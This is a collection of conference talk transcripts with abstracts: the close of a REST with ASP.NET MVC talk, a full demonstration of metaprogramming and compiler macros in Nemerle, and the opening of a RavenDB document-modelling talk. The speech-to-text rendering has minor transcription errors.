with the verbs? With EasyMVC, you don't need to do that anymore. Okay, let me just show you a quick example. And this, again, this is based on what, showing you the simplicity. So let's go to projects, EasyMVC. So this is an example using EasyMVC. This is a sample app. If you look at my controller, customer controller, this one has gets, etc. Employee controller has lists and details, okay. And my MVC application also has no routing. All it does, it says, this is from EasyMVC, it says root generator, generate roots from assembly. And this uses some default conventions that says map action list to verb get on root of the controller. Map action delete to put, sorry, to delete on root controller root with an ID. So basically it's using convention and as long as you stick to those conventions, you don't have to define any verbs or anything. And much the same with content negotiation, it automatically injects it in. Okay, again, point is the simplicity not to, for you to use this. Wait a minute, let me see where I am. We're summing up, don't worry. Okay. Just quickly, client side, oh, hypermedia controls, neither REST, neither web API, nor MVC provide anything in hypermedia controls. So atom and all that, you got to do yourself, either technology you use. Client side, when talking to this, you can use Ajax if you're from a browser, outside of a browser, to implement the client side interaction with a RESTful service. You can use any HTTP library, be it web request, be it easy HTTP, be it RESTsharp, anything you want you can use. Okay. When you're doing it from a web browser, there is no delete verb in the form and that you can override. You have to simulate, you can do that with a hidden field or use an extra header, which is XHTTP method override and say that this is an actual delete. That's one shortcoming when using it from the browser. Okay. So this REST is a series of constraints. If you follow these constraints, you gain a series of advantages. If you don't follow them, you won't gain those benefits. If you do up to level two, you won't get the benefits of REST. You'll just have an HTTP API. Call it for what it is. It's fine. There are no issues with having an HTTP API, but REST does give you a lot more. It gives you flexibility to evolve your system without having to update contracts. And personally, I say embrace HTTP for what it is. You want to use one technology, use it. You want to use the other, use it. But this concept of, oh, I'm going to separate out my API controller for my user interface for me is absolute nonsense. Okay. Recommended reading. REST for web services, Leonardo Richardson. Highly recommended. And not very convenient name, but it's RIP, REST in practice. By Jim Weber and Ian Robinson. Very good. This comes with Java and C sharp examples of how to do things like the hypermedia, links, forms, et cetera. This is a more gentle introduction, but it's a very good introduction. He doesn't call this, if you look up HATIOS in this book, he doesn't refer to it as HATIOS. He refers it to connectedness. Okay. But it does still cover hypermedia in depth. Okay. So if you don't have any questions, thank you once again for being here and enjoy the rest of the show.
|
Creating ReST architectures with ASP.NET MVC is more than just decorating actions with verbs. It’s about leveraging HTTP as an application protocol to its full potential. In doing so, we can create robust and scalable applications, not only from a performance point of view but also in terms of change and maintainability. ASP.NET MVC offers us great potential to create ReST architectures that can be consumed by computers and humans alike, reducing the amount of effort involved. Now combined with the WCF Web API which is focused exclusively around ReSTful constraint, MVC offers us even more possibilities. Come to this session to learn what ReST is really about and how we can create simple yet powerful systems with the Microsoft MVC stack.
|
10.5446/50970 (DOI)
|
Can you hear me okay? Hello everyone, my name is Igor Kachiev. This is our second Numeria session. Last time we discussed the functional programming features of the language. Today we are going to look at the other side of the language. Some people say that this is dark side, dark side of the programming force. It's dark because metaprogramming markers and the ability to extend our compilers is too dangerous things. Okay, it's too big gun for developers because we can shoot ourselves and we can shoot everybody around us. Today I'm going to show this gun and we're going to look at the few metaprogramming tools and metaprogramming techniques that are available for C sharp developers. Then we will create a few markers. We will extend the Numeria compiler and we will extend the Numeria language itself. By the end of the presentation, I believe that you will be able to decide if you should be scared of this size of this gun or probably it fits for you and you can use it and get benefits from using this. Let's start. The definition of metaprogramming is very simple. In a few words, metaprogramming is the writing of metaprograms. Metaprogram is a computer program that creates or manipulates other programs. If you have an application that generates source code and you compile it, compile this code later or your application generates the executable code at the runtime, then your program is metaprogram. I prefer to group metaprogramming tools by the time when they generate or manipulate the code. We can have tools that generate code at the pre-compile time, post-compile time, runtime or write at the compilation time. The first example of pre-compile time called generation tool is Visual Studio Custom Tools. If you have ever used Visual Studio database designer or Visual Studio dataset designer, you should know that they generate some source code. They use a Visual Studio Custom tool for that. One of these tools is T4 templates generator. Now we are going to look at this thing. What is this? We can create T4 template in just a regular way. New item, general, text template. I just generate T4 template and now I can put any garbage here. If we save it, we can see that now we have this garbage in our text file. Let's change. We are going to generate source code. Let's change the extension. It's a good idea to use generated.cs extensions because some tools like, for example, Resharper can process these files differently. Now instead of this garbage, I'm going to put another one. We are going to have just one field. Now if we save this file, we can see that we generate C-sharp code and inside this code we can find our file, our class. Of course, this is useless. Let's create some template that we can reuse to generate many classes like this. I already have it in my clipboard. All I need to do is to define a function and you can see that inside this function I have the template I wrote just before. Now if we save this file, we can... Okay, we didn't even call it. Let's call it first. Generate class. So now we can see this class. Now we can reuse it. We can generate as many classes as we need. Here we go. This is of course not a realistic example. I have another template, another demo that generates a model, view model for my application. By the way, I didn't mention it, but we can remove this code and put in this separated file and call it like... Give it extension like TT. Include and then we can reuse this file from different templates. I already have some templates that implement some logic like creating classes, properties, methods. I have another template that contains the logic to generate iNATIFI property change interface. Now all I need to do is to create new class. I give a name to this class like view model and then I can add as many properties as I need. Let's look at what we just generate. This template generates this file. We can see that we have iNATIFI property change interface. We have fields, we have support for this interface and properties that has a field and all the logic we need to implement and support iNATIFI property change interface. For example, I have another template, editable object. Now if I change the type of my property, for example, to editable, we will see the completely different picture in the generated file. Now we have another interface and for example, for this property, we have two fields to support original and current values. This is metaprogramming, this is a T4 template and in this case, we provide the information what is used by this template right inside the template. If we look at the size of the generated file, for example, right here, we have 15 lines of code and we generated many, almost 200 lines of code. This template, use information I provide right inside the template, but also we can read information from different sources that are available before the compilation time. For example, this template generates database classes, it reads the database schema from my database, from my machine and it generates some classes for Northwind database. We have lots of classes, we have classes for view, for tables, identities, primary keys, all the information we need to work with our database. This is T4 templates. Recompile time code generation, we can use it if we have information before the compilation time. Next item, post-sharp, post-compile time code generation. Let's look at the, I don't have post-sharp installed on my machine, so I will explain just how it works in a few words. In the project settings, as project properties, we have this build event tab and we can put any tool in the post-build event step and on the successful build, for example, we can run this tool. Post-sharp works in this way. You can use post-sharp attributes to decorate your classes, methods, even attributes. For the successful build, post-sharp can read your assemblies and modify something inside this assemblies and maybe generate a new assemblies and add some additional logic in your application. This is post-compile time code generation. Runtime code generation. We can generate executable code when we run our application. We have actually two technologies to do that. System.reflection.emit. I'm going to show you. Just we're not going to write any code because it's crazy. That's the very simple example, but we have a lot of code. This code implements this interface. It generates new class and implements this method and puts this logic inside this method. We need to programatically create new assembly, dynamic assembly, new module type, and everything else. Then we can generate MSIL, Microsoft Intermediate Language. These three lines generate just one line like this and these two lines generate the call of this method. It's very low-level technology. It can be used to improve, for example, increase performance of our applications. Sometimes we use it. Next technology is system.link.expressions. Let's play with this and we'll need it later. I'm going to define a lambda. Func hint hint and just function. Our lambda is going to have just one parameter and we will multiply it by two. Now we can call it and get the result. Can't print it. Now if we run it, we can see that it's four. Yeah, usually two by two is four. Now I'm going to modify this code. First of all, I duplicate it and then I will make one change. I just rename my variables and now I'm going to change one little thing. I'm going to change type of our variable expression. You see this line is okay. I define the same lambda. But now I cannot call it because in this case compiler doesn't generate executable code. It generates a data structure that represents this code. It generates link expressions. And to run it, to compile it, I have to compile this data structure first. Compiled function two and have to compile. So now it's going to work. Now we can run this and we can see that this is four and four. So again, in this line, I defined lambda and compiler generates an executable code. We can run it, we can get result and print it. This line, I define the same lambda, but compiler doesn't generate executable code. It generates data structure that represents this code, that describes this code. I have to compile it and then I can call it. So actually compiler does some magic, but we are big boys and girls, right? So we don't believe in magic, Santa Claus doesn't exist and we know that we can write the same code manually and we can create this data structure ourselves. So let's do it. Now I'm going to duplicate it again. And again, I change my variables. Now I'm going to change this line. Instead of lambda, I'm going to generate the same data structure manually. Okay, I'm going to use the static methods of the expression class. This is lambda. I need these templates, parameters, generic parameters. And now I have to provide the body of my lambda. The body of my lambda is parameter multiplied by two. So now let's generate it. Let's create this. Again, expression, multiply. And now I have to provide left and right parameter. Left parameter is a parameter. It's this one. Okay, so let's create it. Again, expression, parameter. And I need a type of this parameter, this is a Syntagr and name is X. Okay, so now we can use it X. The second, the right side is a constant, but I cannot use just integer because it requires the expression again. So I need to create the representation of this constant. Okay, expression, constant. Okay, so we just created the body of this lambda. Now I have to provide this parameter. Okay, next parameter is our parameter. Actually we're done. If I execute it, we see 446. Yes, it's 6 because I used the best technology ever, copy paste, power it by find and replace. So now it's okay. Again, what's going on here? In this line, we define lambda and compiler generates executable code. We can run it and get the result and print it. In this line, compiler does some magic. It doesn't create executable code. It generates data structure. Here we generate the same data structure manually. Okay? So this is link expressions. This is runtime code generation and this is metaprogramming as well. Next item, compile time code generation. If you have a C++ background or if you're familiar with C++, then probably you know that there is a kind of strange technology like templates plus macros. You can use it. It's very difficult to understand. It's very difficult to create something that can be useful and the result, unfortunately, result is very primitive. But anyway, we can use this technology to generate code at the compile time. Unfortunately it uses some probably side effects of the compiler, but still we can generate something. Namely macros and C++ macros, these are completely different things. They have only names, the same names, but this is totally different things. Namely is one of the very few languages that have been designed to support metaprogramming from the beginning. So metaprogramming is native things in the language. We can say that Nimera has a pluggable compiler and macros are plugins to the compiler. Compilation process is a very kind of complicated thing and it has few steps like parsing, typing, semantic analysis, code generation. But the very first thing that compiler does is creating a data structure that represents the compiled source code, which is the same things what we saw here. And when compiler generates this code, this data structure, we can manipulate it. We can modify it. We can analyze it. We can add new nodes to this structure. We can remove something if we need. And for the developers, from the developers point of view, the macros is just a function. This function is called by the compiler and this function has access to the compiler API and it can change and modify or transform this data structure. We call this data structure abstract syntax tree, okay, IST. So macros actually manipulates this abstract syntax tree. So now we're going to create a macro, Nimera macro and see how it works and what we can do with that. I have already a demonstration project. We are going to test our macros and this project. And another project is a macro library. We have to have two projects. As the macro is a plugin, it has to be compiled before we can use it. So we will create macros in this macro library. And the first macro is going to be our database generator. So what we saw right here. So we are going to implement similar logic, simpler, but similar. So let's create it. We have macro wizard and the macro name is going to be DB import, right? Okay. We have two types of macros. Macro attribute and expression level macro. In this case, we are going to use macro attribute. Also we have few steps like before type members, so it's related to typing and we are going to leave this as it is. Also we are going to create assembly level macro. Our macro is going to have just one parameter, database name, database name of this string type. Okay, so the wizard generated this template and now we can modify it and implement this macro. Actually we can implement our macro right here, but we have created an additional module for implementing this macro. So we are going to use it. Okay, first thing what we are going to do is to read information from our database. So this is macro, it will be compiled, it will be called by the compiler at the compile time. And at this time we are going to read information from our database. So we are going to do it right. I created the helper and get schema methods, so we are not going to waste our time to do that. Let's use this method. Okay, let's look what it does. This method defined next to, right inside this library, so actually macro library can contain any code. Some like this for example, helpers, whatever, and macro says everything. In this method we just create open connection, we create connection, open connection, then read schema from our database, read columns, tables, and then we even map some database types to.NET types. And then we return this data structure. We return a list of tuples and every tuple is a first field of the tuple, the table name and second field is the list of fields and every field has a name of the field and type. Okay, so very simple. I didn't create the structure for that, so I can use tuples to return this simple structure. Okay, so let's store it somewhere. Next step we are going to do, we need a namespace for all our tables. We don't want to put them just in general namespace. We want to create namespace and the name of this namespace is going to be database name. So let's create a namespace inside of this macro, inside of our, this is, it's going to be inside of a compiler when compiler compiles our application. So now we need to use the compiler API and we have this parameter type. So this is the entry point to the compiler API and we need this manager class and this manager class, we need this coreNF property. This property has this method what we need, enter into namespace. This method can be used to get existing namespace or create new one if it doesn't exist. It takes as a parameter a list of strings, why list? This namespace has two parts, so we need to provide a list of strings. But we are going to create just namespace with the name of our database. But of course we can't put something else, for example, let's set it, let's say table. So we are going to have like database name and then tables, okay. Let's do it in this way. It returns globalNF object, so let's, we are going to need it. And okay, and now we are going to iterate through our database schema and define new classes for each table. The type of this item is, you remember this is table name and list of fields. So this is tuple. I am going to decompose this tuple right here. So I have already, I have fields for every field in our tuple and now I am going to define a table. We have environment and we have define method. If we look at the parameter, this is part of the abstract syntax tree of the compiler. And what I can do, I can create this class, for example, type declaration and so on, but I am not going to do this. If I start doing this, we are going to spend the whole day and probably the weekend, so I am going to use another technique. You remember that in this code right here, compiler, I provide C sharp code, but compiler generated some data structure. We have very similar technique in Numeria. We call it quasi-quotation. We use these brackets and now inside these brackets I can write Numeria code and compiler, Numeria compiler will create not the executable code, but data structure, ISTA syntax tree. C sharp can create only expressions like this, but we need a higher declaration. We are going to write a class to declare, write a code to declare a class, right? But we use the same quasi-quotation, the same syntax for both for expressions, for defining classes, for everything. And if I need to define class, I have to use these prefixes, these modifiers, so now compiler knows that I am going to define a new class. And now I can put just regular Numeria code, public class. And now one more thing, now I need this name to be a class name, okay? So I need to put this variable somehow in my code and inside these brackets. We use this quotation, this syntax to do that. And I have to use site modifier, I will explain it later what is this. Okay, so actually I just created a new class inside the compiler, it returns type builder. So now I need to do one more thing. I have to call the compile, compile method. So now we are done, actually. This code will define new class and in this loop we will create one class for each table in our database. But we don't have fields yet, right? So now we need to put some properties for every field in our table. So now let's create properties. Field is a list of tuples. So I have name of the field and type. Now I need to transform it somehow into the abstract syntax tree. I can use select method, for example, like this, system.link.expr, enumerable select. But in Emulator we have map and the difference is that map returns lists and I need a list actually. So I'm going to use lists but it's actually the same function. And of course I'm going to use quasi-quotation again. The type of this field is strings, okay, name and type. So I'm going to decompose this tuple again, name, type. So now I can use them again, declaration. I'm going to generate something like, for example, public, customer, ID, string, get, set. Okay, something like that. But instead of this name I'm going to use this variable. And again, I'm going to use quotation, name, use, site. And instead of string I'm going to use type variable. Type, use, site. So now it should be okay but we need to store it somewhere. Members. And now we can insert it in our class. If we have just one variable we use this syntax for quotation. If we have list we use another syntax, we use this one. So it means that I insert the whole list, okay. And now if we compile it it should be okay and we can test it. Okay, it works. So now let's go to our application, test application. First thing I have to do, I have to compile my macro library. I have to do it. Then I have to open the namespace where I define my macro. I have to use macro library and now I can use my attribute. Assembly, this is assembly level attribute. DB import. And we have to provide the name of the database northwind. Okay, I think it's okay and now we can create an instance of some table. We have northwind namespace and I added the additional part of the namespace tables and now we have all the tables in this namespace. So we can create an instance and we will let's print this variable. Okay, so as you can see we have all the tables. There is only one problem. CLR allows to create the classes with the space inside the name but we will not be able to use it from C sharp from Nimirlia. So let's fix this problem. Let's replace all the spaces with underscore, for example. Replace underscore. Now if we, let's compile it again. Now we see that the name changed and now we can use it. Okay, let's run the application and we see that we printed the name of the type. Maybe it's a good idea to print something more detailed, more descriptive. And to do that we would have you write the two string method of this class, right, but how can we do it? We can do it in this way. We can define, we can say that our public class is partial and right inside of our macro and now we can define another part of this class. Tables and this is partial class customer. Okay. And now we can override the two string method. We are ready to implement. So and in this method we can implement, we can return some value. For example, we will print, we will return some like customer ID is and let's say, let's add a value, customer ID. Okay, so now if we print it, oops, we have an error. Partial class here, let's compile it. Okay, now we can see that we override two string method and now we print some more descriptive information. So let's put something in this property. Okay. Also, we can print more fields. In this case, we can use string join and the new line as a separator. Now we need an array and then we will print another field. This is a company name. Okay. And if we print it, if we run it, it's going to print something. Okay, but we have metaprogramming tool. So let's compiler generate all these things for us. Okay, so let's define another macro. And this macro will override two string method for any class where we apply this macro. It's going to be a macro attribute as well. And the name is going to be implements to string macro attribute. But now we need another phase with type members. So we will, because we need all these members. And we are going to use this attribute on the type. We don't need parameters, so let's create it. Okay. First thing we have to do is to override two string method. We have type builder here. In our previous macro, we created this type builder, as you remember. We created it. Now compiler provides us with this information with this type builder. And now we can use type builder, define, we define new method. And of course, we're going to use quasi quotation here. And here we'll put override, override our two string method. And inside this method, we're going to put exactly the same logic. Okay. But instead of these fields, we need to generate expressions for every property of our class. So let's do it. I'm going to use type builder again, because we can call the get property method. So actually, we are using the compiler API. And we have all the properties. And now we can, we need to generate expressions to expressions like this, okay, to print our properties. So we will transform our properties to abstract syntax tree to expressions. Map again. We have property. And here we have another quasi quotation block. But now I don't have to specify decal modifier, because we're going to generate an expression. This is default mode for this quasi block. Okay. I need to generate this code. So instead of this name, I'm going to use pname. No. I'm going to use quasi, I'm going to use quotation again. pname plus this string. And now I'm going to use pname again, but with the use site. So in this case, compiler use only information like a string, only name of the property. In this case, compiler, insert the value of this property in our syntax tree. So and now we can use it right here. And again, if this is list, we have to use this syntax. Now let's decorate our class with this attribute. Implements to string. Okay. Oh, yeah. Redefinition, of course. Because we, I didn't delete this. Okay. Now we have all the properties and one more thing. We can define this attribute in our db import markers right here. So markers are recursive. We can use it. We can use one markers from another one. And let's compile it again. And execute and we see that it works. Okay. Actually, we don't even need this class here. Okay. This is markers that are implemented as attributes. Now we're going to play with the marker that introduce new syntax in the language. Actually we're going to extend the language itself. As an example, we'll use two sequences, two arrays and we'll create a forage, something like forage statement. But this forage statement will iterate through two lists at the same time, right? So just for example. Let's say we have samples. Okay. No, I don't have it. Okay. Anyway. I need to define two arrays. Array, like one, two, three. Another array. So first of all, I'm going to create a program I want to generate. Then I will put this code in my marker. So first of all, I'm going to write the application without the marker. And now I'm going to write the code I want to generate. So this is, it's going to be, hiter1.exe get the numerator. Then I need the numerator for another array. And now I'm going to use the while loop to iterate through the hiter1. So this arrays. And now I'm going to get the current, come on. Current values. And then I can do something with these values. For example, we can print it. Write line and x, x, y, y. Okay. So I need something like that. But instead of doing all these things, I want automated and create new keyword and create a marker to implement all this logic. Okay, so let's copy it. And now let's create new marker. Let's call it for each two. This time it's going to be expression level marker. And we will define syntax. We need two parameters, expression. And the type of this parameter is going to be the expression and body. And body. Okay. So we see now we have a syntax section and now we can define our syntax. Let's for each. Then we're going to have like a round bracket and we will close this bracket. That's it. This is our syntax. But now we need to implement the transformation of our expression. Syntax level marker takes as a parameter one or more expressions and it transform it and returns another expression. Again I'm going to use Goise quotation block. And I put all this code I want to generate right inside this block. Okay. Instead of this body, I'm going to use body that will be provided by compiler when this marker is going to be called. So I use this expression. A little bit later we're going to work on this expression. Now let's see what we want from this marker. How we are going to, how we want to see, we want this syntax. X, Y for example, we will use tuple syntax here. Then we need in keyword and then our Y as our arrays. And after that we will have the body of this loop. So we need something like that. But we need to check that the format of this expression of this part of our, format of our marker is this one. So we need to check it somehow. And now we are going to do that. So we need to work on this expression. This expression is this part. Okay. So we need to check this one. Again we're going to use match operator, match expression. And pattern matching can work with the algebraic data types, numbers, strings, whatever, but also it supports quasi-quotation. So I can put all these things right inside. Pattern matching and pattern matching, we'll check that the input expression matches this format. Okay. So now I'm going to move it right here. Okay. But we need to bind these things, these variables, these parts of our expression to what we are going to generate. If you remember from the previous session, we can bind variables, we can introduce new variables in pattern matching. We can bind these variables with the part of our expressions. But if we use quasi-quotation, we have to use a little bit different syntax. We use the dover sign for that. So now it means that pattern matching will check that we have this format and all these parts, for example, this part will be bound to this variable, this one to y, and these parts will be bound to this xs and xy variable. And after that, we can use these variables in our quasi-quotation block to generate a new expression. So actually we done. The only problem is that if we have any problem, we need to generate an error. Okay. We need to inform our user that something is wrong. So if we match our expression then we find that this is in this format, then we generate this code. If not, we're going to generate an error. We have a message class and it has a fatal error method. And this method takes two parameters, location of our expression because if anything wrong, we want to generate an error with the information where we have this error. So we need this location. And then we can print something like expected. Let's say this and buddy. Okay. So now let's compile it and see if it works. Okay. Okay. It works. And as you can see, we have new keyword. This is a macro for each two. We have new keyword and we can even see what we generated by this macro. Okay. We can create more markers but we can play with this macro. And for example, we can even use different languages. For example, we can, let's try to use Chinese, for example. For each in Chinese is going to be something like that. Okay. So we have a macro with keyword in Chinese. We have already implementation. I am just going to reuse this implementation. And instead of for each, of course, we need new name for macro instead of this, I am going to use this something. I have no idea what I am doing but let's try. Okay. Now we can compile it. Okay. And as you can see, we have new keywords. This is actually the dark side, I believe. So if you get crazy, you can just rewrite the whole language and you can localize it and use, for example, Russian, Chinese, Norwegian, whatever. Okay. So actually, what else? Actually we are done. Here are our contact information, our site, namely.org, our Google group where we just discuss the issues and language features. GitHub.com, we host our sources there. And download page and our contact information. Valachistekov is the main brain behind the Nemerliya. And Igor Kashi with SME. So now if you have any questions, I would be happy to answer. Okay. No? Yeah. The best way, actually this is an assembly. So you can distribute it as a usual project, as a source, as you can compile it and distribute it as a DLL. This is just an assembly. Okay. You don't have to actually, we have reference to this assembly, but we need this reference. Only we compile the project. After we have an application, we don't care if this marker exists. If you have dependencies in your project, and if you have dependencies like you call some functions, regular functions, like all methods in this assembly, then you have to. But if you have just markers, you don't have to. You don't need to distribute it. Okay. And that's it. Thanks for coming.
|
Nemerle is one of the very few languages that can be extended by developers. Nemerle macros allow extending language syntax and automate routine operations that developers face every day and cannot solve by using traditional techniques to achieve reusability. Also, we will discuss DSL oriented and language oriented programming.
|
10.5446/50971 (DOI)
|
Hi guys. My name is Tomar. I work for Ibuenitin Rhinos. We make RavenDB. We see a lot of people who actually have some problems getting into the non-relational mindset. So this session will hopefully help you get the idea of document-oriented design, specifically RavenDB, which has some features that allow you to do some perhaps extra things that you wouldn't have seen elsewhere. This is, I call this session, a walkthrough. This is going to be sort of a walkthrough. We're not going to take one large project and just work off it, trying to, you know, spot all the problems and fix them. We are trying to, we will be using different samples and, please, if you have any model that you would want to bring up, please bring up. We actually, in these kinds of sessions, we actually appreciate the discussion. So please feel free to do so. Right. So how many of you guys have actually used RavenDB before? For real project? Not many. So the relational databases have been with us for quite a long time now. That's about 40 years. And many people have tried, are feeling like a bit not comfortable moving away from them. And even if they do, they will be moving away, but they will be using the same mindset using non-relational database. I'm not only talking about document databases. I'm talking about anything that is not relational. Even key value stores and other stuff like that. You would find people who use those tools in a way that actually fits the relational mindset, not the mindset that you actually need when you're using a non-relational database. Relational databases were created in around the 70s. A guy called under the name of Edgar Cod wrote an academic paper. And there he described what's called a relational algebra. You probably already know that. But the point is that relational algebra and the way the relational databases work, they are optimized for rights. That means around the 70s, you would have paid a lot of money to get even a small storage space. But human hours weren't that, didn't cost that much. I don't have the actual numbers. We sometimes actually bring real numbers. I'm not that good with numbers. Forgive me about that. But you actually can see that people have tried to use human hours more than they actually cared about space. I mean, they cared more about space because space cost a lot more. So they would have tried to use as much as less space as they could. So therefore, the term that we know, normalization. This is why you would normalize. You would have the data stored once and never stored twice anywhere. So that's not the only difference from the 70s and now, between the 70s and now. You actually have many other differences. For example, you have another way of thinking about UI. Okay? Back in the 70s, the only UIs you would have seen are like very simple UIs and then you'd have other UIs. UIs like this one, you wouldn't have seen back then. A very complex UI, running one page actually costs quite a lot in terms of data and of intersecting data. To render this page alone, it would have cost quite a lot of money. I mean, sorry, quite a lot of operations. Let's take a look. We have a couple of questions. So the stack overflow, I can trust everybody here knows. Yeah? So we have a couple of questions and the list of questions we can load from one table. We have the title and we have the person who asked that question. So that's another table. And now we have the score of that person. We have the number of views. We have how many answers. We have votes, which will probably be stored somewhere else. We have tags. We have favorite tags. We have the menus which might not be static. All of those types of things will require rendering of quite a lot of data. And if we talk about relational, the relational scheme, we'll be talking about a lot of tables. Another thing is the number of views is actually using this application. So back in the 70s or even 10 years ago, you most probably won't be coding stuff to be used by too many people. Forty years ago, you would be writing an application to be used by one person only. Today, you are writing an application to be used by potentially millions. And that makes the difference between doing a few operations and doing not quite a few operations, like even doing one operation and we're doing 10 operations when you scale it to million users, that difference becomes quite large. Another example is, for example, is this eBay website. So we have a lot of products and we have the menus and then we have the cart. We have a lot of stuff like that that, again, makes a lot of queries necessary. A lot of joins. Joins are not that cheap as well. So let's start by thinking about an e-commerce website. For an e-commerce website, I would probably have products, a table of products, and each box that is going to pop up on the screen will represent a table. So I'm going to have a product table. I'm going to have an orders table because people want to order. And actually, I need to store the actual people as well. So I'm going to have three tables, but these are only the basic stuff. I mean, I do need to store all the lines what this person ordered. I do need to store the ways of available shipping, the ways of actually shipping the shipped data about that shipment. I will need to be storing discounts, available discounts, or discounts that will actually be used in an order. For a customer, I'll be storing probably some sort of payment details. Let's for a second assume that I'm storing credit card details and I encrypted. For products, I will be storing categories table because categories are hierarchical. I will need to store them in separate table and possibly make a lot of calculations. For example, what happens when I want to show a product display page and show some sort of breadcrumbs on the actual categories. So only display the categories is going to be a very costly operation because I now need to make some sort of recursive calls to my database. And then what happens when I want to have variants of products? What happens when I have different colors for a product, different sizes, if it's clothes, for example, more sophisticated variants, what happens then? It might be, might grow up to be in more than one additional table. So I'm in a big trouble here. So to be able to solve that, people have been moving from a relational databases to a non-relational databases. What is usually called the NoSQL movement. I'm not sure I quite like this term, NoSQL, even if you interpret it as like North only SQL, but the idea is that in relational database, you would have used many operations to provide one result. In those types of databases, we are moving away from relational databases to, we want to be able to make one operation, one logical operation, one database operation to perform one logical operation. That is, if I want to show a list of products or one product, I would want to make only one operation. I would want to load only that product. I wouldn't want to load the product and all the categories that it is in and then all the variants and touch that many tables and do that many joins. I would want to really avoid that. To do that, we use what we call a unit of change. That is, we are going to look at every piece of information of every, let's try not to use complex words right now. Let's try, we will be looking at each of those contained scenarios as a document. As we are talking about RevenDB, which is a document database, we are going to be looking at each of those as a document. We have a product. That product is going to contain all the information it needs to be accessible, to be usable to the user. We are going to send the user only one document instead of sending a lot of information from very different tables. Also for customers, I am going to load a customer to process an order. That customer data is going to be contained in one document. If I have additional information for him, for example, credit cards, it is going to be contained within the document. Same thing for orders. A product document, RevenDB stores everything within a JSON. JSON is basically very simple to read, very simple to write data representation, much easier than XML. That representation allows us to put even a hierarchical data within one document, within one document database entity. We can have a property for name, which is quite standard. Then we can have an array of colors. Then we can have non-string properties like a price or a weight. We can have objects contained within one object. This is one document. One document represents one object. I can contain more objects within it. For example, in an order document, I can have the customer, for example, the customer object contained within the order. I am not sure I want to do that. I will see in a second why. Basically, I can do that. In order document, we will contain the total price. It will contain an array of order lines objects. Each order line object will describe either a product or other stuff the user put into his order. I can put a shipping object. I can put the discounts to use, the discount codes, or whatever my logic is. Basically, it will just work without worrying too much. I don't need to do joints anymore. I can just talk with one document. This is called transactional boundaries. In domain-driven design, you might know it as an aggregate root. Basically, whenever you have one unit of change, you are going to contain it within a document. Every change is being made within the document. That's more or less the requirement, if to say that more clearly. This is basically how you identify your aggregate roots. You will be looking at what stuff you want to do, what operations, what data you want to read, and basically form that aggregate root, that unit of change based on that info, based on use cases. Different aggregate roots can be referenced each other using in RavenDB. Document IDs are basically strings, not integers or anything like that, like in relational databases. Basically, you will have, for example, you will have an order document and it can reference the user, for example. Instead of containing the user, it could have just referenced the user by storing a string customer ID property and then just store that user ID in that property. Let's take two more examples for that use. I have a shipping company, or my company makes a lot of shipments, and I want to track them. I'm using UPS or FedEx, and they send my packages, and they ping me on each and every event. Whenever my package moves country, I get a lot of events from the UPS or FedEx. I want to store those events. In relational database, I would have the shipment that I sent, and that shipment is going to have some sort of ID. Then whenever an event comes in, I will be putting an event with the shipping ID inside some sort of a table. Then whenever I would want to make a view of the shipping and to see the current status, even if I wanted to... Let me phrase that differently. If I wanted to see the current status of the shipment, I would have to touch the tables. If I wanted to see all the events, I would, for that shipment, I would have to touch at least two tables. To avoid that, and because basically a shipment event, an event that happened, basically has no meaning outside the contents of the shipping, the shipping itself, I would just contain it within one document. I would have a document of shipping, of a shipment, and that document will contain everything I need to know about the shipment. Then I have also an array of events. I can just manage the events within the array. I can make that, I can sort it, I can do that everything I want and store it in a stored or I can just load it and do operations in memory which are much cheaper than doing this on the server using some sort of a schema. Let's take another example. I mentioned categories, for example an e-commerce website. We usually make a differentiation between categories and tags. Tags are a concept that is flat. It just means I have that many tags available to me. I have a lot of, let's say, products, I have a lot of objects. I'm just tagging them. I have a lot of tags. I have one tag I'm putting on this product. I have three tags I'm putting to that product, et cetera, et cetera. Now categories are hierarchical. They are not flat. I have categories one under another. So it's basically tags but with some sort of a structure. So how would I represent that in a document database? Would I need one, one to suggest a way of doing that? So in a relational database, I would have used a table and each category would have a row and I would just probably iterate recursively on that. Even though I can even do that in a strong procedure to make it even more performant, but again, I will do several operations on certain scenarios. For example, if I wanted to get breadcrumbs for a product. Refinitably, we'll do that probably different. Now there's one small thing that I might need to mention. There is no real one way to make any design decisions. You have a lot of options in front of you usually and you will just have to understand what one option gives you and what other stuff the other option give you and you will have to decide for yourself what's best for you. Every option will have trade-offs. So for example, for this category scenario in an e-commerce solution, I would probably just go with one document containing all the categories directly sorted. That is one category object within a big document. I would have many, many, many categories and each category will contain the child categories of it, it has. And basically, that document might grow a bit large, but I can just have it on the client side. I can cache it. I can aggressively cache it. That's a RefinDB feature. It basically means I don't care if this document changes even once in an hour. I don't care. I want to update it only on every that minute. I mean, I can update it once in 24 hours. Because category, this category's document is not going to be updated too often. We usually see that in our applications. So I can just don't care about the actual updates that happen and only update it every 24 hours. So I'm going to cache a potentially large document on my client website, on my client application, and then do all the operations in memory. So I will have one, one object with hierarchical categories and we just alter it through them in memory. So I don't have any joints. I don't have any recursive operations on the server side. I only do this in memory without pulling new data and everything just works really fast. So we talked about three unit types of unit of change. The orders, products, and we saw how to handle shipment with events. And then we have this type of category. Now what this type of thinking gives us is for it can really affect scaling because what we have with relational databases is because we always need to have all the tables available to us, it is very hard to scale. It is all the related tables. And if one table grows large, we don't have much of a choice instead of just duplicating that table. So scaling with databases is more or less what caused the no SQL movement to start. Not the only reason because schema less is also important. But scaling is quite tough to do with SQL. When you have this concept of unit of change and you have all that data, all the data you need for one operation within one document, you basically can just much easier, it's much easier for you to scale. You can just say, okay, I want these types of documents here, these types of documents there. And even if you mix between, if you scale within the same type of documents, you basically end up having all the information you need even though not all the types of documents are on the same node. Another thing this gives us is faster operations because everything is now done on the same document. I only operate against, usually against one document. But yet, sometimes we talked about references between aggregate routes, between different documents. Now, we had an example of the order that have a list of order lines. And that list of order lines, I didn't mention how to implement that. But basically, we have the option of storing the actual document reference within that array. But what happens when the user name changes, or the product name changes, or the product price changes? Usually when we deal with these kinds of things, we get to something that we know as denormalization. We would want to denormalize the data. We would want to take that kind of data that we are working with and put it within the actual document that we are working with. For example, with the example I gave with orders. So we have an order document, and that order document is going to have a list of products. But in a year from now, I might want to load that order. And when I load that order, I might get to a point where I'm seeing the product name which was not like it was when the order was placed. And I might see a new price that wasn't there. To avoid that, I want to store the price, the name, the customer address, all of them within that order document. Because I don't care if the user change, the customer change is address. That specific order was sent to a specific address. So I'm going to just denormalize all of that within that same document. It might also help when sharding, because sometimes you might not have some types of documents within one shard, and you still want to index on it. And so that also might be useful there. So basically, this is how denormalization would look like. If this is part of my order document, so I would have an array of order lines, but instead of saving the product ID, I 